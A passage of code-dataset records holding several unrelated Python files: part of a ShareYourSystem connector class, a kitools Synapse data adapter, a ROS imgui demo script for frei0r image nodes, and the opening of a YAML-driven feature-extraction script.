get)',\n\t\t\t\t(\"self.\",self,[\n\t\t\t\t\t\t\t\t'ConnectingKeyVariable',\n\t\t\t\t\t\t\t\t'ConnectingGetBool',\n\t\t\t\t\t\t\t])\n\t\t\t]\n\t\t)\n\t\t'''\n\t\t\n\t\t#Check\n\t\tif self.ConnectingKeyVariable!=None:\n\n\t\t\t#Check\n\t\t\tif self.ConnectingGetBool:\n\t\t\t\n\t\t\t\t#init\n\t\t\t\tConnectedValueVariable=self[self.ConnectingKeyVariable]\n\n\t\t\telse:\n\n\t\t\t\t#alias\n\t\t\t\tConnectedValueVariable=self.ConnectingKeyVariable\n\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t\t[\n\t\t\t\t\t\t'in the end, ConnectedValueVariable is ',\n\t\t\t\t\t\tSYS._str(ConnectedValueVariable)\n\t\t\t\t\t]\n\t\t\t\t)\n\t\t\t'''\n\n\t\t\t#/####################/#\n\t\t\t# Make it parent if it was not yet the case\n\t\t\t#\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t[\n\t\t\t\t\t'We make the ConnectedValueVariable parentUp',\n\t\t\t\t\t'ConnectedValueVariable is ',\n\t\t\t\t\tSYS._str(ConnectedValueVariable),\n\t\t\t\t\t('ConnectedValueVariable.',ConnectedValueVariable,[\n\t\t\t\t\t\t\t'ParentedTotalPathStr'\n\t\t\t\t\t\t])\n\t\t\t\t]\n\t\t\t)\n\t\t\t'''\n\n\t\t\t#parentUp\n\t\t\tConnectedValueVariable.parentUp()\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t[\n\t\t\t\t\t'Ok it has connected',\n\t\t\t\t\t('ConnectedValueVariable.',ConnectedValueVariable,[\n\t\t\t\t\t\t\t'ParentedTotalPathStr'\n\t\t\t\t\t\t])\n\t\t\t\t]\n\t\t\t)\n\t\t\t'''\n\n\t\t\t#/####################/#\n\t\t\t# Now set the ConnectedToVariable\n\t\t\t# \n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t[\n\t\t\t\t\t'We just set the ConnectedToVariable'\n\t\t\t\t]\n\t\t\t)\n\t\t\t'''\n\n\t\t\t#set\n\t\t\tself.ConnectedToVariable=ConnectedValueVariable\n\n\tdef mimic_get(self):\n\n\t\t#Check\n\t\tif type(self.GettingKeyVariable)==str:\n\n\t\t\t#Check\n\t\t\tif self.GettingKeyVariable.startswith(ConnectGetSetPrefixStr):\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(\n\t\t\t\t\t\t[\n\t\t\t\t\t\t\t'We get connect here',\n\t\t\t\t\t\t\t('self.',self,['GettingKeyVariable'])\n\t\t\t\t\t\t]\n\t\t\t\t\t)\n\t\t\t\t'''\n\n\t\t\t\t#connect\n\t\t\t\tself.connect(\n\t\t\t\t\t\tSYS.deprefix(\n\t\t\t\t\t\t\tself.GettingKeyVariable,\n\t\t\t\t\t\t\tConnectGetSetPrefixStr\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\n\t\t\t\t#return\n\t\t\t\treturn {'HookingIsBool':False}\n\n\t\t#set\n\t\tBaseClass.get(self)\n\n\tdef mimic__print(self,**_KwargVariablesDict):\n\n\t\t#/##################/#\n\t\t# Modify to see maybe ConnectedToVariable\n\t\t#\n\n\t\t#Check\n\t\tif self.PrintingSelfBool:\n\n\t\t\t#Check\n\t\t\tif self.ConnectedToVariable!=None:\n\n\t\t\t\t#/##################/#\n\t\t\t\t# Add in the pointer descrp\n\t\t\t\t#\t\n\n\t\t\t\t#add\n\t\t\t\tself.PrintingCopyVariable.PrintingInfoStr+=' ->'+str(\n\t\t\t\t\tid(self.ConnectedToVariable)\n\t\t\t\t)\n\n\t\t\t\t#/##################/#\n\t\t\t\t# Stringify\n\t\t\t\t#\n\n\t\t\t\tself.PrintingCopyVariable.ConnectedToVariable=Printer.getPointerStr(\n\t\t\t\t\tself.PrintingCopyVariable.ConnectedToVariable\n\t\t\t\t)\n\t\t\t\t\n\t\t\telse:\n\n\t\t\t\t#append\n\t\t\t\tself.PrintingCopyVariable.PrintingInstanceSkipKeyStrsList.append('ConnectedToVariable')\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tprint('Connecter l 325')\n\t\t\t\tprint('Remove ConnectedToVariable')\n\t\t\t\tprint('self.PrintingCopyVariable.PrintingInstanceSkipKeyStrsList is ')\n\t\t\t\tprint(self.PrintingCopyVariable.PrintingInstanceSkipKeyStrsList)\n\t\t\t\tprint('')\n\t\t\t\t'''\n\t\t\t\n\t\t\n\t\t#/##################/#\n\t\t# Call the base method\n\t\t#\n\n\t\t#call\n\t\tBaseClass._print(self,**_KwargVariablesDict)\n\n\tdef propertize_setWatchAfterParentWithParenterBool(self,_SettingValueVariable):\n\n\t\t#/##################/#\n\t\t# Call the base method\n\t\t#\n\n\t\tBaseClass.propertize_setWatchAfterParentWithParenterBool(self,_SettingValueVariable)\n\n\t\t#/##################/#\n\t\t# connect for each managed value in the Connections teams\n\t\t#\n\n\t\t#mapConnect\n\t\tself.mapConnect()\n\n\tdef mapConnect(self,_TeamPrefixStr='Connect',_GetterVariable=None):\n\n\t\t#/################/#\n\t\t# Check the level\n\t\t#\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t[\n\t\t\t\t'We map connect here',\n\t\t\t\t'_TeamPrefixStr is '+_TeamPrefixStr\n\t\t\t]\n\t\t)\n\t\t'''\n\n\t\t#filter\n\t\tTeamTagStrsList=SYS._filter(\n\t\t\tlambda __KeyStr:\n\t\t\t__KeyStr.startswith(_TeamPrefixStr),\n\t\t\tself.TeamDict.keys()\n\t\t)\n\n\t\t#Check\n\t\tif len(TeamTagStrsList)==1:\n\n\t\t\t#get\n\t\t\tTeamTagStr=TeamTagStrsList[0]\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t[\n\t\t\t\t\t'TeamTagStr is '+TeamTagStr,\n\t\t\t\t]\n\t\t\t)\n\t\t\t'''\n\n\t\t\t#/#################/#\n\t\t\t# omes level\n\t\t\t#\n\n\t\t\t#Check\n\t\t\tif TeamTagStr.endswith('omes'):\n\n\t\t\t\t#map\n\t\t\t\tmap(\n\t\t\t\t\tlambda __DeriveConnecter:\n\t\t\t\t\t__DeriveConnecter.mapConnect(\n\t\t\t\t\t\t_TeamPrefixStr,\n\t\t\t\t\t\tself\n\t\t\t\t\t),\n\t\t\t\t\tself.TeamDict[\n\t\t\t\t\t\tTeamTagStr\n\t\t\t\t\t].ManagementDict.values()\n\t\t\t\t)\n\t\t\t\t\t\n\t\t\telse:\n\n\t\t\t\t#/#################/#\n\t\t\t\t# ions level\n\t\t\t\t#\n\n\t\t\t\t#setConnections\n\t\t\t\tself.setConnections(TeamTagStr,_GetterVariable)\n\n\tdef setConnections(self,_TeamTagStr,_GetterVariable):\n\n\t\t#/#################/#\n\t\t# ions level\n\t\t#\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t[\n\t\t\t\t'We set connections here',\n\t\t\t\t'_TeamTagStr is '+_TeamTagStr\n\t\t\t]\n\t\t)\n\t\t'''\n\n\t\t#Check\n\t\tif _GetterVariable==None:\n\t\t\t_GetterVariable=self\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t[\n\t\t\t\t'We map a connect here',\n\t\t\t\t'TeamTagStr is '+TeamTagStr,\n\t\t\t\t'We get the things to connect from here the top connecter'\n\t\t\t]\n\t\t)\n\t\t'''\n\n\t\t#get\n\t\tConnectionsDeriveConnecter=self.TeamDict[\n\t\t\t\t\t_TeamTagStr\n\t\t\t\t]\n\n\t\t\"\"\"\n\t\t#map\n\t\tConnectionsKeyVariablesList=map(\n\t\t\tlambda __ItemTuple:\n\t\t\t__ItemTuple[0]\n\t\t\tif __ItemTuple[1].ConnectingKeyVariable==None\n\t\t\telse __ItemTuple[1].ConnectingKeyVariable,\n\t\t\tConnectionsDeriveConnecter.ManagementDict.items()\n\t\t)\n\n\t\t#map\n\t\tmap(\n\t\t\t\tlambda __ConnectionsKeyVariable,__DeriveConnecter:\n\t\t\t\t__DeriveConnecter.connect(\n\t\t\t\t\t_GetterVariable[\n\t\t\t\t\t\t__ConnectionsKeyVariable\n\t\t\t\t\t],\n\t\t\t\t\t_GetBool=False\n\t\t\t\t)\n\t\t\t\tif type(__ConnectionsKeyVariable)==str\n\t\t\t\telse __DeriveConnecter.connect(\n\t\t\t\t\t__ConnectionsKeyVariable,\n\t\t\t\t\t_GetBool=False\n\t\t\t\t),\n\t\t\t\tConnectionsKeyVariablesList,\n\t\t\t\tConnectionsDeriveConnecter.ManagementDict.values()\n\t\t\t)\n\t\t\"\"\"\n\n\t\t#map\n\t\tmap(\n\t\t\tlambda __ItemTuple:\n\t\t\tself.setConnection(\n\t\t\t\t__ItemTuple[0],\n\t\t\t\t__ItemTuple[1],\n\t\t\t\t_GetterVariable\n\t\t\t),\n\t\t\tConnectionsDeriveConnecter.ManagementDict.items()\n\t\t)\n\n\tdef setConnection(self,_KeyVariable,_ValueDeriveConnecter,_GetterVariable):\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t[\n\t\t\t\t'We setConnection here',\n\t\t\t\t'_KeyVariable is '+SYS._str(_KeyVariable)\n\t\t\t]\n\t\t)\n\t\t'''\n\n\t\t#/#################/#\n\t\t# Determine the key from the management key or inside\n\t\t#\n\n\t\tif _ValueDeriveConnecter.ConnectingKeyVariable==None:\n\t\t\tKeyVariable=_KeyVariable\n\t\telse:\n\t\t\tKeyVariable=_ValueDeriveConnecter.ConnectingKeyVariable\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t[\n\t\t\t\t'Ok now',\n\t\t\t\t'KeyVariable is '+SYS._str(KeyVariable)\n\t\t\t]\n\t\t)\n\t\t'''\n\n\t\t#/##################/#\n\t\t# Connect with or without getting before\n\t\t#\n\n\t\t#connect\n\t\tif type(KeyVariable)==str:\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t[\n\t\t\t\t\t'We get and connect'\n\t\t\t\t]\n\t\t\t)\n\t\t\t'''\n\n\t\t\t#connect\n\t\t\t_ValueDeriveConnecter.connect(\n\t\t\t\t_GetterVariable[\n\t\t\t\t\tKeyVariable\n\t\t\t\t],\n\t\t\t\t_GetBool=False\n\t\t\t)\n\n\t\telse:\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t[\n\t\t\t\t\t'We directly connect'\n\t\t\t\t]\n\t\t\t)\n\t\t\t'''\n\n\t\t\t#connect\n\t\t\t_ValueDeriveConnecter.connect(\n\t\t\t\tKeyVariable,\n\t\t\t\t_GetBool=False\n\t\t\t)\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t[\n\t\t\t\t'In the end',\n\t\t\t\t#'_ValueDeriveConnecter.ConnectedToVariable is ',\n\t\t\t\t#SYS._str(_ValueDeriveConnecter.ConnectedToVariable),\n\t\t\t\t'_ValueDeriveConnecter.ConnectedToVariable.ManagementTagStr is '+ _ValueDeriveConnecter.ConnectedToVariable.ManagementTagStr\n\t\t\t]\n\t\t)\n\t\t'''\n\t\t\n#\n\n#\n\n#set\nParenter.ParenterClass.ManagingValueClass=ConnecterClass\n\n#\n\n#\nConnecterClass.PrintingClassSkipKeyStrsList.extend(\n\t[\n\t\t'ConnectingKeyVariable',\n\t\t'ConnectingGetBool',\n\t\t#'ConnectedToVariable',\n\t]\n)\n#\n","repo_name":"Ledoux/ShareYourSystem","sub_path":"Pythonlogy/ShareYourSystem/Standards/Itemizers/Connecter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32087544551","text":"import os\nimport synapseclient\nfrom ..base_adapter import BaseAdapter\nfrom .synapse_remote_entity import SynapseRemoteEntity\nfrom ...data_uri import DataUri\nfrom ...sys_path import SysPath\nfrom ...env import Env\nfrom ...utils import Utils\n\n\nclass SynapseAdapter(BaseAdapter):\n \"\"\"Data Adapter for Synapse.\"\"\"\n\n DATA_URI_SCHEME = 'syn'\n _client = None\n\n @classmethod\n def client(cls):\n \"\"\"Gets a new or cached instance of a logged in Synapse client.\n\n Returns:\n synapseclient.Synapse\n \"\"\"\n if not cls._client:\n cls._client = synapseclient.Synapse(configPath=Env.SYNAPSE_CONFIG_PATH())\n cls._client.login(silent=True)\n return cls._client\n\n def name(self):\n \"\"\"Gets the name of the data adapter.\n\n Returns:\n String\n \"\"\"\n return 'Synapse'\n\n def connected(self):\n \"\"\"Gets if the synapseclient is connected and logged in.\n\n Returns:\n True or False\n \"\"\"\n try:\n return SynapseAdapter.client()._loggedIn() is not False\n except Exception as ex:\n # TODO: log this exception\n pass\n return False\n\n def get_entity(self, remote_id, version=None, local_path=None):\n \"\"\"Gets an entity from Synapse.\n\n Args:\n remote_id: The id of the Synapse entity.\n version: The version of the entity to get. Set to None to get the latest version.\n local_path: Where to download the entity to (in the case of downloadable entities).\n\n Returns:\n SynapseRemoteEntity\n \"\"\"\n entity = SynapseAdapter.client().get(\n remote_id,\n downloadFile=local_path is not None,\n downloadLocation=local_path,\n ifcollision='overwrite.local',\n version=version\n )\n\n remote_entity = SynapseRemoteEntity(entity)\n\n return remote_entity\n\n def create_project(self, name):\n \"\"\"Creates a new project in Synapse.\n\n Args:\n name: The name of the project to create.\n\n Returns:\n SynapseRemoteEntity\n\n Raises:\n Exception: Raised if a project with the same name already exists.\n \"\"\"\n # Check if the project already exists.\n syn_project_id = SynapseAdapter.client().findEntityId(name=name)\n if syn_project_id:\n raise Exception('Synapse project already exists with name: {0}'.format(name))\n\n syn_project = SynapseAdapter.client().store(synapseclient.Project(name=name))\n return SynapseRemoteEntity(syn_project)\n\n def data_pull(self, ki_project_resource):\n \"\"\"Downloads a resource and all of it's children.\n\n Args:\n ki_project_resource: The resource to download.\n\n Returns:\n SynapseRemoteEntity\n \"\"\"\n data_uri = DataUri.parse(ki_project_resource.remote_uri)\n syn_entity = SynapseAdapter.client().get(data_uri.id, downloadFile=False)\n\n if not ki_project_resource.abs_path:\n # This is the first pull so figure out where it lives locally.\n self._set_abs_path_from_entity(ki_project_resource, syn_entity)\n\n download_path = ki_project_resource.abs_path\n\n if self._is_file(syn_entity):\n download_path = os.path.dirname(download_path)\n\n # Make sure a version didn't get set on a folder.\n # Synapse will blow up when requesting a version on a folder.\n if self._is_folder(syn_entity) and ki_project_resource.version:\n ki_project_resource.version = None\n ki_project_resource.kiproject.save()\n\n entity = SynapseAdapter.client().get(\n data_uri.id,\n downloadFile=True,\n downloadLocation=download_path,\n ifcollision='overwrite.local',\n version=ki_project_resource.version\n )\n\n remote_entity = SynapseRemoteEntity(entity, local_path=download_path)\n\n # Compare path parts until this is fixed: https://github.com/Sage-Bionetworks/synapsePythonClient/issues/678\n assert SysPath(remote_entity.local_path).abs_path.lower() == \\\n SysPath(ki_project_resource.abs_path).abs_path.lower()\n\n if remote_entity.is_directory:\n # Create the local directory for the folder.\n SysPath(remote_entity.local_path).ensure_dirs()\n self._pull_children(ki_project_resource.root_resource or ki_project_resource,\n remote_entity.source,\n remote_entity.local_path)\n\n return remote_entity\n\n def _pull_children(self, root_ki_project_resource, syn_parent, download_path):\n \"\"\"Pulls all the children of a parent.\n\n Args:\n root_ki_project_resource: The root resource.\n syn_parent: The Synapse parent entity.\n download_path: Where to download the children.\n\n Returns:\n None\n \"\"\"\n kiproject = root_ki_project_resource.kiproject\n syn_children = SynapseAdapter.client().getChildren(syn_parent, includeTypes=['folder', 'file'])\n\n for syn_child in syn_children:\n child_data_uri = DataUri(SynapseAdapter.DATA_URI_SCHEME, syn_child.get('id')).uri\n child_name = syn_child.get('name')\n child_local_path = os.path.join(download_path, child_name)\n child_data_type = kiproject.get_data_type_from_path(child_local_path).name\n\n child_resource = kiproject.find_project_resource_by(data_type=child_data_type,\n remote_uri=child_data_uri,\n abs_path=child_local_path,\n root_id=root_ki_project_resource.id)\n\n if not child_resource:\n child_resource = kiproject._data_add(data_type=child_data_type,\n remote_uri=child_data_uri,\n local_path=child_local_path,\n name=child_name,\n root_ki_project_resource=root_ki_project_resource)\n\n self.data_pull(child_resource)\n\n def _set_abs_path_from_entity(self, ki_project_resource, syn_entity):\n \"\"\"Tries to figure out where a file/folder lives with in a KiProject data directories.\n\n Args:\n ki_project_resource: The resource to set the path for.\n syn_entity: The synapse entity to get the path for.\n\n Returns:\n None\n\n Raises:\n Exception: Raised when the path cannot be determined.\n \"\"\"\n kiproject = ki_project_resource.kiproject\n\n remote_path = self._get_remote_path(syn_entity)\n\n # Always use the resource's data_type if available.\n data_type = ki_project_resource.data_type or kiproject.get_data_type_from_path(remote_path)\n\n if data_type is None:\n raise Exception(\n 'Could not determine local file path for: {0}, try setting the data_type on this resource'.format(\n ki_project_resource.remote_uri))\n\n local_rel_path = remote_path\n\n if local_rel_path.startswith(data_type.rel_path):\n local_rel_path = local_rel_path.replace(data_type.rel_path, '', 1)\n\n if local_rel_path.startswith(os.sep):\n local_rel_path = local_rel_path[1:]\n\n abs_path = os.path.join(kiproject.local_path, data_type.rel_path, local_rel_path)\n\n ki_project_resource.abs_path = abs_path\n assert ki_project_resource.data_type is not None\n\n kiproject.save()\n\n def data_push(self, ki_project_resource):\n \"\"\"Uploads a resource and all of it's children to Synapse.\n\n Args:\n ki_project_resource: The resource to upload.\n\n Returns:\n SynapseRemoteEntity\n \"\"\"\n kiproject = ki_project_resource.kiproject\n\n project_data_uri = DataUri.parse(kiproject.project_uri)\n\n resource_belongs_to_ki_project = True\n syn_parent = None\n\n # Check if the synapse entity belongs to the KiProject's remote project\n # and get the correct synapse parent if it doesn't.\n if ki_project_resource.remote_uri is not None:\n resource_data_uri = DataUri.parse(ki_project_resource.remote_uri)\n\n syn_entity = SynapseAdapter.client().get(resource_data_uri.id, downloadFile=False)\n\n syn_parents = [syn_entity] if self._is_project(syn_entity) else list(SynapseParentIter(syn_entity))\n\n # The last item will always be a Synapse Project.\n resource_syn_project = syn_parents[-1]\n assert self._is_project(resource_syn_project)\n\n if resource_syn_project.id != project_data_uri.id:\n # The resource does not belong to the same Synapse project so get its parent.\n resource_belongs_to_ki_project = False\n syn_parent = syn_parents[0]\n else:\n syn_parent = resource_syn_project\n assert project_data_uri.id == syn_parent.id\n\n # If the resource belongs to the KiProject's remote project then get or create the remote folder structure.\n if resource_belongs_to_ki_project:\n if syn_parent is None:\n syn_parent = SynapseAdapter.client().get(project_data_uri.id)\n\n sys_path = SysPath(ki_project_resource.abs_path, rel_start=kiproject.local_path)\n\n # Get or create the folders in Synapse.\n for part in sys_path.rel_parts:\n # Break when we hit the filename.\n if part == sys_path.basename:\n break\n syn_parent = self._find_or_create_syn_folder(syn_parent, part)\n\n return self._data_push(ki_project_resource, syn_parent)\n\n def _data_push(self, ki_project_resource, syn_parent):\n \"\"\"Uploads a resource to Synapse parent entity.\n\n Args:\n ki_project_resource: The resource to upload.\n syn_parent: The Synapse parent entity.\n\n Returns:\n SynapseRemoteEntity\n \"\"\"\n kiproject = ki_project_resource.kiproject\n sys_path = SysPath(ki_project_resource.abs_path, rel_start=kiproject.local_path)\n syn_entity = None\n\n if sys_path.is_dir:\n # Find or create the folder in Synapse.\n syn_entity = self._find_or_create_syn_folder(syn_parent, sys_path.basename)\n\n # Push the children\n self._push_children(ki_project_resource.root_resource or ki_project_resource, syn_entity, sys_path.abs_path)\n else:\n # Upload the file\n syn_entity = SynapseAdapter.client().store(synapseclient.File(path=sys_path.abs_path, parent=syn_parent),\n forceVersion=False)\n\n has_changes = False\n\n # If this is the first push then update the KiProjectResource.\n if ki_project_resource.remote_uri is None:\n has_changes = True\n ki_project_resource.remote_uri = DataUri(self.DATA_URI_SCHEME, syn_entity.id).uri\n\n # Clear the version when pushing\n if ki_project_resource.version is not None:\n has_changes = True\n ki_project_resource.version = None\n\n if has_changes:\n kiproject.save()\n\n remote_entity = SynapseRemoteEntity(syn_entity, local_path=sys_path.abs_path)\n\n # Compare path parts until this is fixed: https://github.com/Sage-Bionetworks/synapsePythonClient/issues/678\n assert SysPath(remote_entity.local_path).abs_path.lower() == \\\n SysPath(ki_project_resource.abs_path).abs_path.lower()\n\n return remote_entity\n\n def _push_children(self, root_ki_project_resource, syn_parent, local_path):\n \"\"\"Uploads child objects to Synapse.\n\n Args:\n root_ki_project_resource: The resource to upload.\n syn_parent: The Synapse parent to upload to.\n local_path: The local path if files and folders to upload.\n\n Returns:\n SynapseRemoteEntity\n \"\"\"\n kiproject = root_ki_project_resource.kiproject\n\n dirs, files = Utils.get_dirs_and_files(local_path)\n\n for entry in files + dirs:\n sys_path = SysPath(entry.path)\n child_data_type = kiproject.get_data_type_from_path(sys_path.abs_path).name\n\n child_resource = kiproject.find_project_resource_by(data_type=child_data_type,\n abs_path=sys_path.abs_path,\n root_id=root_ki_project_resource.id)\n if not child_resource:\n child_resource = kiproject._data_add(data_type=child_data_type,\n local_path=sys_path.abs_path,\n name=sys_path.basename,\n root_ki_project_resource=root_ki_project_resource)\n\n self._data_push(child_resource, syn_parent)\n\n def _get_remote_path(self, syn_entity):\n \"\"\"Gets the remote path for a Synapse Folder or File (e.g., folder1/folder2/file1.csv)\n\n Args:\n syn_entity: The Synapse entity to get the path for.\n\n Returns:\n String\n \"\"\"\n if not (self._is_folder(syn_entity) or self._is_file(syn_entity)):\n return ''\n\n path_parts = [syn_entity.name]\n\n for e in SynapseParentIter(syn_entity):\n if self._is_project(e):\n break\n path_parts.insert(0, e.name)\n\n # Return the path matching the OS's separator.\n return os.sep.join(path_parts)\n\n def _find_or_create_syn_folder(self, syn_parent, folder_name):\n \"\"\"Finds or creates a folder in Synapse.\n\n Args:\n syn_parent: The Synapse entity to find or create the folder under.\n folder_name: The name of the folder to find or create.\n\n Returns:\n synapseclient.Folder\n \"\"\"\n\n # TODO: can any of this be cached?\n syn_entity_id = SynapseAdapter.client().findEntityId(folder_name, parent=syn_parent)\n\n if syn_entity_id:\n syn_entity = SynapseAdapter.client().get(syn_entity_id)\n if self._is_folder(syn_entity):\n return syn_entity\n else:\n raise Exception(\n 'Cannot create folder, name: {0} already taken by another entity: {1}'.format(folder_name,\n syn_entity.id))\n\n return SynapseAdapter.client().store(synapseclient.Folder(name=folder_name, parent=syn_parent))\n\n def _is_project(self, syn_entity):\n \"\"\"Gets if the Synapse entity is a Project.\n\n Args:\n syn_entity: The Synapse entity to check.\n\n Returns:\n True or False\n \"\"\"\n return isinstance(syn_entity, synapseclient.Project)\n\n def _is_folder(self, syn_entity):\n \"\"\"Gets if the Synapse entity is a Folder.\n\n Args:\n syn_entity: The Synapse entity to check.\n\n Returns:\n True or False\n \"\"\"\n return isinstance(syn_entity, synapseclient.Folder)\n\n def _is_file(self, syn_entity):\n \"\"\"Gets if the Synapse entity is a File.\n\n Args:\n syn_entity: The Synapse entity to check.\n\n Returns:\n True or False\n \"\"\"\n return isinstance(syn_entity, synapseclient.File)\n\n def _is_project_folder_file(self, syn_entity):\n \"\"\"Gets if the Synapse entity is a Project, Folder, or File.\n\n Args:\n syn_entity: The Synapse entity to check.\n\n Returns:\n True or False\n \"\"\"\n return self._is_project(syn_entity) or self._is_folder(syn_entity) or self._is_file(syn_entity)\n\n\nclass SynapseParentIter:\n \"\"\"Iterator for traversing Synapse parents.\"\"\"\n\n def __init__(self, syn_entity):\n \"\"\"Instantiates a new instance.\n\n Args:\n syn_entity: The Synapse entity to start with.\n \"\"\"\n self._current_entity = syn_entity\n\n def __iter__(self):\n return self\n\n def __next__(self):\n \"\"\"Gets the next parent entity until the Project entity is found.\n\n NOTE: There is a parent above a Synapse Project but it is not accessible.\n\n Returns:\n The next Synapse parent.\n \"\"\"\n if isinstance(self._current_entity, synapseclient.Project):\n raise StopIteration()\n\n self._current_entity = SynapseAdapter.client().get(self._current_entity.get('parentId', None))\n\n return self._current_entity\n","repo_name":"ki-tools/kitools-py","sub_path":"src/kitools/data_adapters/synapse/synapse_adapter.py","file_name":"synapse_adapter.py","file_ext":"py","file_size_in_byte":16976,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"21574594238","text":"import math\nimport rospy\n\nfrom imgui_ros_msgs.msg import Widget\nfrom imgui_ros_msgs.srv import *\n# from time import sleep\n\n# TODO(lucasw) move to imgui_ros utility module\ndef image_sub_widget(name, tab_name, topic):\n widget = Widget()\n widget.name = name\n widget.tab_name = tab_name\n widget.topic = topic\n widget.type = Widget.SUB\n widget.sub_type = Widget.IMAGE\n return widget\n\ndef dr_widget(name, tab_name, server):\n widget = Widget()\n widget.name = name\n widget.tab_name = tab_name\n widget.topic = server\n widget.type = Widget.DYNREC\n return widget\n\nclass DemoGui:\n def __init__(self):\n pass\n\n def run(self, namespace=''):\n rospy.wait_for_service(namespace + '/add_window')\n self.win_srv_name = namespace + '/add_window'\n\n rospy.wait_for_service(self.win_srv_name, timeout=4.0)\n self.cli = rospy.ServiceProxy(self.win_srv_name, AddWindow)\n\n use_image_source = rospy.get_param(\"~use_image_source\", False)\n self.add_images(use_image_source)\n self.add_dr(\"manip\", [\"/mix_images\"], x=0.0, y=500.0, height=500.0)\n self.add_dr(\"roto_zoom0\", [\"/roto_zoom0\"], x=300.0, y=500.0, height=500.0)\n for i in range(3):\n name = \"frei0r\" + str(i)\n ns = \"/\" + name\n servers = [ns + \"/selector\",\n ns + \"/siggen1\",\n ns + \"/siggen2\",\n ns + \"/frei0r\",\n ]\n self.add_dr(name, servers, x=10.0 + i * 300, height=500.0)\n\n def add_dr(self, name, servers, x=0.0, y=0.0, width=300.0, height=600.0):\n req = AddWindowRequest()\n req.name = name\n req.init = True\n req.fractional = False\n if req.fractional:\n # TODO(lucasw) fractional doesn't allow dragging of window around\n req.position.x = 0.0\n req.position.y = 0.0\n req.size.x = 0.5\n req.size.y = 0.5\n else:\n req.position.x = x\n req.position.y = y\n req.size.x = width\n req.size.y = height\n\n tab_name = 'dr'\n\n for server in servers:\n widget = dr_widget(server.replace(\"/\",\" \"), tab_name, server)\n req.widgets.append(widget)\n\n try:\n resp = self.cli(req)\n rospy.loginfo(resp)\n except rospy.service.ServiceException as e:\n rospy.logerr(self.win_srv_name + \" \" + str(e))\n\n def add_images(self, use_image_source=False):\n req = AddWindowRequest()\n req.name = 'images'\n req.init = True\n req.fractional = False\n if req.fractional:\n # TODO(lucasw) fractional doesn't allow dragging of window around\n req.position.x = 0.0\n req.position.y = 0.0\n req.size.x = 0.5\n req.size.y = 0.5\n else:\n req.position.x = 900.0\n req.position.y = 0.0\n req.size.x = 400.0\n req.size.y = 800.0\n tab_name = 'images'\n\n if use_image_source:\n widget = Widget()\n widget.name = \"image pub\"\n widget.tab_name = tab_name\n widget.topic = \"/image_source2/image_raw\"\n widget.type = Widget.PUB\n widget.sub_type = Widget.IMAGE\n req.widgets.append(widget)\n\n # TODO(lucasw) parse the node graph and displaying all image outputs\n # instead of hardcoding.\n for ind in range(3):\n widget = image_sub_widget(\"image sub {}\".format(ind),\n tab_name,\n \"/frei0r{}/image_out\".format(ind))\n req.widgets.append(widget)\n\n widget = image_sub_widget(\"usb\", tab_name, \"/image_source1/image_raw\")\n req.widgets.append(widget)\n widget = image_sub_widget(\"png\", tab_name, \"/image_source2/image_raw\")\n req.widgets.append(widget)\n if True:\n widget = image_sub_widget(\"roto\", tab_name, \"/rotozoom/image_out\")\n req.widgets.append(widget)\n widget = image_sub_widget(\"mix\", tab_name, \"/mix/image\")\n req.widgets.append(widget)\n\n try:\n resp = self.cli(req)\n rospy.loginfo(resp)\n except rospy.service.ServiceException as e:\n rospy.logerr(e)\n\ndef main(args=None):\n rospy.init_node(\"imgui_ros_demo2\")\n\n try:\n demo = DemoGui()\n demo.run()\n finally:\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"lucasw/frei0r_image","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5126374125","text":"import re\nimport os\nimport yaml\nimport numpy as np\nimport pandas as pd\n\nfrom scipy.io import loadmat\nfrom glob import glob\n\nfrom progressbar import Bar, ETA, Percentage, ProgressBar\nfrom joblib import Parallel, delayed\nfrom optparse import OptionParser\n\nfrom sklearn.pipeline import make_pipeline\n\n\ndef from_yaml_to_func(method, params):\n \"\"\"Convert yaml to function\"\"\"\n prm = dict()\n if params is not None:\n for key, val in params.iteritems():\n prm[key] = eval(str(val))\n return eval(method)(**prm)\n\n\nparser = OptionParser()\n\nparser.add_option(\"-s\", \"--subject\",\n dest=\"subject\", default=1,\n help=\"The subject\")\nparser.add_option(\"-c\", \"--config\",\n dest=\"config\", default=\"config.yml\",\n help=\"The config file\")\nparser.add_option(\"-o\", \"--old\",\n dest=\"old\", default=False, action=\"store_true\",\n help=\"process the old test set\")\nparser.add_option(\"-n\", \"--njobs\",\n dest=\"njobs\", default=8,\n help=\"the number of jobs\")\n\n(options, args) = parser.parse_args()\n\nsubject = int(options.subject)\nnjobs = int(options.njobs)\n\n# load yaml file\nyml = yaml.load(open(options.config))\n\n# output of the script\noutput = './features/%s' % yml['output']\n# create forlder if it does not exist\nif not os.path.exists(output):\n os.makedirs(output)\n\n# imports\nfor pkg, functions in yml['imports'].iteritems():\n stri = 'from ' + pkg + ' import ' + ','.join(functions)\n exec(stri)\n\n# parse pipe function from parameters\npipe = []\nfor item in yml['preproc']:\n for method, params in item.iteritems():\n 